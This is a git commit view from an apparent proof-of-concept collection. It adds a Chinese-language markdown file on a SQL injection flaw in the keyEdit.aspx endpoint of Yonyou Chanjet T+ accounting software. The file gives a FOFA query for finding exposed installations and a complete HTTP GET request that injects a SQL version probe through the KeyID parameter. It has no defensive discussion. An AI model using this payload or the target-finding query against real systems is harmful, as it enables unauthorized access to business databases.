mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md
This commit is contained in:
parent
437fad5c98
commit
e2415599a4
20
用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md
Normal file
20
用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md
Normal file
@ -0,0 +1,20 @@
|
||||
## 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="畅捷通-TPlus"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: close
|
||||
Host: xx.xxx.xxx.xxx
|
||||
Accept-Charset: utf-8
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user